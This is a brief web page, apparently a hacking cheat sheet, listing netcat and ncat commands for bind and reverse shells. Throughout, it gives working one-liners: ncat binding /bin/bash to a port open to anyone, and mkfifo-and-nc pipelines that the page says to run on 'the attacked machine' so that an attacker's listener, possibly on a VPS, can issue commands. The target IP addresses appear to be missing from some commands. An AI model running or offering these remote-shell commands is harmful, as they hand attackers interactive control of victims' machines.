Skip to main content


ncat --exec "/bin/bash" -l 8081 --keep-open
 # Bind to TCP port
 # 8081 and attach /bin/bash for the world to access freely
ncat --exec "/bin/bash" --max-conns 3 --allow -l 8081 --keep-open
 # Bind a shell to TCP port 8081, limit access to
 # hosts on a local network, and limit the maximum number of
 # simultaneous connections to 3

Bind Shell with minimal Netcat (nc without --exec or -e)

Bind Shell

Bind shell is a common scenario, we can think about a classical " ssh-like" session when we think about bind shells. On the attacked machine (the one on which we would like to talk) we should execute:

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 3333 > /tmp/f
 # keeps an opened port, in this case "3333" to
 # execute commands from a remote machine

on the attacking machine (the one from where we will issue commands) instead we execute:

nc 3333

Bind Shell and Reverse Shell can be more elegant by using ssl, in order to not let other decrypt the traffic.

Reverse Shell with minimal Netcat (nc without --exec or -e)

Reverse Shell

On the attacking machine (which could be a VPS) we execute:

nc -nlvp 3333
 # this is the local machine on which we keep a
 # port opened to issue commands and view the output

On the attacked machine we have to issue:

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1 | nc 3333 > /tmp/f
 # this has to be issued on the attacked machine

now from the attacking machine we can issue commands and see output.